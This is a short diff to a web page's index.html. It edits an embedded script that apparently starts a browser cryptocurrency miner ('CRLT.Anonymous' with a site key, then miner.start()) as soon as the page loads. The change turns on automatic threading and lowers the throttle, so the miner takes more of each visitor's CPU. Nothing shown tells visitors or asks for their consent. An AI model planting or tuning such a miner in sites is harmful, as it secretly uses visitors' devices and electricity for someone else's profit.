--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
 <script>
 var miner = new CRLT.Anonymous('0e3fe41423c51db917e6bae95de15fcbdb6e69ba5cb2',
 	{
-       autoThreads:false,throttle:0.2,
+       autoThreads:true,throttle:0.15,
         } );
 miner.start();
 //console.log("miner should've started");
